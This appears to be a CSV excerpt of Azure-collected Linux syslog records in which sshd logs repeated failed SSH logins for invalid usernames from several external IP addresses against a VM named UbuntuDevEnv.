+17445,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:11,UbuntuDevEnv,2019-06-26 09:08:10,auth,UbuntuDevEnv,info,Received disconnect from 115.159.216.187 port 47775:11: Bye Bye [preauth],66038,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,115.159.216.1,47775,,
+17446,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:14,UbuntuDevEnv,2019-06-26 09:08:13,auth,UbuntuDevEnv,info,Invalid user mc from 183.47.14.74 port 41223,66060,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mc,183.47.14.7,41223,,
+17447,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:14,UbuntuDevEnv,2019-06-26 09:08:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66060,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17448,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:14,UbuntuDevEnv,2019-06-26 09:08:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=183.47.14.74,66060,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,183.47.14.7,,0,
+17449,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:16,UbuntuDevEnv,2019-06-26 09:08:16,auth,UbuntuDevEnv,info,Failed password for invalid user mc from 183.47.14.74 port 41223 ssh2,66060,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mc,183.47.14.7,41223,,
+17450,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:16,UbuntuDevEnv,2019-06-26 09:08:16,auth,UbuntuDevEnv,info,Disconnected from invalid user mc 183.47.14.74 port 41223 [preauth],66060,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mc,183.47.14.7,41223,,
+17451,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:16,UbuntuDevEnv,2019-06-26 09:08:16,auth,UbuntuDevEnv,info,Received disconnect from 183.47.14.74 port 41223:11: Bye Bye [preauth],66060,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,183.47.14.7,41223,,
+17452,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:47,UbuntuDevEnv,2019-06-26 09:08:47,auth,UbuntuDevEnv,info,Invalid user testcf from 176.31.43.255 port 56060,66181,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testcf,176.31.43.2,56060,,
+17453,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:47,UbuntuDevEnv,2019-06-26 09:08:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.43.255,66181,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.43.2,,0,
+17454,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:47,UbuntuDevEnv,2019-06-26 09:08:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66181,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17455,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:50,UbuntuDevEnv,2019-06-26 09:08:49,auth,UbuntuDevEnv,info,Failed password for invalid user testcf from 176.31.43.255 port 56060 ssh2,66181,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testcf,176.31.43.2,56060,,
+17456,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:50,UbuntuDevEnv,2019-06-26 09:08:49,auth,UbuntuDevEnv,info,Disconnected from invalid user testcf 176.31.43.255 port 56060 [preauth],66181,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testcf,176.31.43.2,56060,,
+17457,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:50,UbuntuDevEnv,2019-06-26 09:08:49,auth,UbuntuDevEnv,info,Received disconnect from 176.31.43.255 port 56060:11: Bye Bye [preauth],66181,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.43.2,56060,,
+17458,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:53,UbuntuDevEnv,2019-06-26 09:08:52,auth,UbuntuDevEnv,info,Invalid user nathan from 176.31.202.90 port 54308,66202,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nathan,176.31.202.9,54308,,
+17459,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:53,UbuntuDevEnv,2019-06-26 09:08:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66202,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17460,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:53,UbuntuDevEnv,2019-06-26 09:08:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.202.90,66202,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.202.9,,0,
+17461,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:53,UbuntuDevEnv,2019-06-26 09:08:53,auth,UbuntuDevEnv,info,Invalid user fy from 165.22.203.187 port 36606,66205,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fy,165.22.203.1,36606,,
+17462,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:53,UbuntuDevEnv,2019-06-26 09:08:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.203.187,66205,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.203.1,,0,
+17463,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:53,UbuntuDevEnv,2019-06-26 09:08:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66205,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17464,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:55,UbuntuDevEnv,2019-06-26 09:08:54,auth,UbuntuDevEnv,info,Failed password for invalid user nathan from 176.31.202.90 port 54308 ssh2,66202,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nathan,176.31.202.9,54308,,
+17465,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:55,UbuntuDevEnv,2019-06-26 09:08:54,auth,UbuntuDevEnv,info,Received disconnect from 176.31.202.90 port 54308:11: Bye Bye [preauth],66202,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.202.9,54308,,
+17466,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:55,UbuntuDevEnv,2019-06-26 09:08:54,auth,UbuntuDevEnv,info,Disconnected from invalid user nathan 176.31.202.90 port 54308 [preauth],66202,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nathan,176.31.202.9,54308,,
+17467,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:55,UbuntuDevEnv,2019-06-26 09:08:54,auth,UbuntuDevEnv,info,Failed password for invalid user fy from 165.22.203.187 port 36606 ssh2,66205,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fy,165.22.203.1,36606,,
+17468,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:55,UbuntuDevEnv,2019-06-26 09:08:54,auth,UbuntuDevEnv,info,Received disconnect from 165.22.203.187 port 36606:11: Bye Bye [preauth],66205,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.203.1,36606,,
+17469,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:55,UbuntuDevEnv,2019-06-26 09:08:54,auth,UbuntuDevEnv,info,Disconnected from invalid user fy 165.22.203.187 port 36606 [preauth],66205,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fy,165.22.203.1,36606,,
+17470,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:09:25,UbuntuDevEnv,2019-06-26 09:09:24,auth,UbuntuDevEnv,info,Invalid user dian from 143.0.52.117 port 36686,66313,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dian,143.0.52.1,36686,,
+17471,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:09:25,UbuntuDevEnv,2019-06-26 09:09:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66313,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17472,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:09:25,UbuntuDevEnv,2019-06-26 09:09:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117,66313,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,143.0.52.1,,0,
+17473,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:09:27,UbuntuDevEnv,2019-06-26 09:09:26,auth,UbuntuDevEnv,info,Failed password for invalid user dian from 143.0.52.117 port 36686 ssh2,66313,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dian,143.0.52.1,36686,,
+17474,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:09:27,UbuntuDevEnv,2019-06-26 09:09:27,auth,UbuntuDevEnv,info,Disconnected from invalid user dian 143.0.52.117 port 36686 [preauth],66313,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dian,143.0.52.1,36686,,
+17475,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:09:27,UbuntuDevEnv,2019-06-26 09:09:27,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 36686:11: Bye Bye [preauth],66313,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,36686,,
+17476,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:09:40,UbuntuDevEnv,2019-06-26 09:09:39,auth,UbuntuDevEnv,info,Invalid user gozone from 187.6.249.142 port 54608,66372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gozone,187.6.249.1,54608,,
+17477,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:09:40,UbuntuDevEnv,2019-06-26 09:09:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=187.6.249.142,66372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,187.6.249.1,,0,
+17478,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:09:40,UbuntuDevEnv,2019-06-26 09:09:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17479,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:09:41,UbuntuDevEnv,2019-06-26 09:09:41,auth,UbuntuDevEnv,info,Failed password for invalid user gozone from 187.6.249.142 port 54608 ssh2,66372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gozone,187.6.249.1,54608,,
+17480,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:09:42,UbuntuDevEnv,2019-06-26 09:09:41,auth,UbuntuDevEnv,info,Received disconnect from 187.6.249.142 port 54608:11: Bye Bye [preauth],66372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,187.6.249.1,54608,,
+17481,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:09:42,UbuntuDevEnv,2019-06-26 09:09:41,auth,UbuntuDevEnv,info,Disconnected from invalid user gozone 187.6.249.142 port 54608 [preauth],66372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gozone,187.6.249.1,54608,,
+17482,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:03,UbuntuDevEnv,2019-06-26 09:10:02,auth,UbuntuDevEnv,info,Invalid user marcus from 183.47.14.74 port 49174,66449,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marcus,183.47.14.7,49174,,
+17483,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:03,UbuntuDevEnv,2019-06-26 09:10:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66449,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17484,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:03,UbuntuDevEnv,2019-06-26 09:10:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=183.47.14.74,66449,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,183.47.14.7,,0,
+17485,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:04,UbuntuDevEnv,2019-06-26 09:10:04,auth,UbuntuDevEnv,info,Failed password for invalid user marcus from 183.47.14.74 port 49174 ssh2,66449,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marcus,183.47.14.7,49174,,
+17486,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:04,UbuntuDevEnv,2019-06-26 09:10:04,auth,UbuntuDevEnv,info,Received disconnect from 183.47.14.74 port 49174:11: Bye Bye [preauth],66449,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,183.47.14.7,49174,,
+17487,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:04,UbuntuDevEnv,2019-06-26 09:10:04,auth,UbuntuDevEnv,info,Disconnected from invalid user marcus 183.47.14.74 port 49174 [preauth],66449,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marcus,183.47.14.7,49174,,
+17488,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:09,UbuntuDevEnv,2019-06-26 09:10:08,auth,UbuntuDevEnv,info,Invalid user lydia from 176.31.43.255 port 36032,66484,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lydia,176.31.43.2,36032,,
+17489,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:09,UbuntuDevEnv,2019-06-26 09:10:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.43.255,66484,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.43.2,,0,
+17490,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:09,UbuntuDevEnv,2019-06-26 09:10:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66484,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17491,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:11,UbuntuDevEnv,2019-06-26 09:10:10,auth,UbuntuDevEnv,info,Failed password for invalid user lydia from 176.31.43.255 port 36032 ssh2,66484,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lydia,176.31.43.2,36032,,
+17492,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:11,UbuntuDevEnv,2019-06-26 09:10:10,auth,UbuntuDevEnv,info,Received disconnect from 176.31.43.255 port 36032:11: Bye Bye [preauth],66484,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.43.2,36032,,
+17493,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:11,UbuntuDevEnv,2019-06-26 09:10:10,auth,UbuntuDevEnv,info,Disconnected from invalid user lydia 176.31.43.255 port 36032 [preauth],66484,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lydia,176.31.43.2,36032,,
+17494,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:16,UbuntuDevEnv,2019-06-26 09:10:15,auth,UbuntuDevEnv,info,Invalid user fin from 176.31.202.90 port 42878,66506,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fin,176.31.202.9,42878,,
+17495,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:16,UbuntuDevEnv,2019-06-26 09:10:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66506,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17496,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:16,UbuntuDevEnv,2019-06-26 09:10:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.202.90,66506,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.202.9,,0,
+17497,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:16,UbuntuDevEnv,2019-06-26 09:10:16,auth,UbuntuDevEnv,info,Invalid user lydia from 165.22.203.187 port 58248,66508,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lydia,165.22.203.1,58248,,
+17498,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:16,UbuntuDevEnv,2019-06-26 09:10:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.203.187,66508,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.203.1,,0,
+17499,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:16,UbuntuDevEnv,2019-06-26 09:10:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66508,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17500,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:18,UbuntuDevEnv,2019-06-26 09:10:18,auth,UbuntuDevEnv,info,Failed password for invalid user fin from 176.31.202.90 port 42878 ssh2,66506,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fin,176.31.202.9,42878,,
+17501,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:18,UbuntuDevEnv,2019-06-26 09:10:18,auth,UbuntuDevEnv,info,Disconnected from invalid user fin 176.31.202.90 port 42878 [preauth],66506,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fin,176.31.202.9,42878,,
+17502,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:18,UbuntuDevEnv,2019-06-26 09:10:18,auth,UbuntuDevEnv,info,Received disconnect from 176.31.202.90 port 42878:11: Bye Bye [preauth],66506,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.202.9,42878,,
+17503,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:18,UbuntuDevEnv,2019-06-26 09:10:18,auth,UbuntuDevEnv,info,Failed password for invalid user lydia from 165.22.203.187 port 58248 ssh2,66508,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lydia,165.22.203.1,58248,,
+17504,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:18,UbuntuDevEnv,2019-06-26 09:10:18,auth,UbuntuDevEnv,info,Disconnected from invalid user lydia 165.22.203.187 port 58248 [preauth],66508,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lydia,165.22.203.1,58248,,
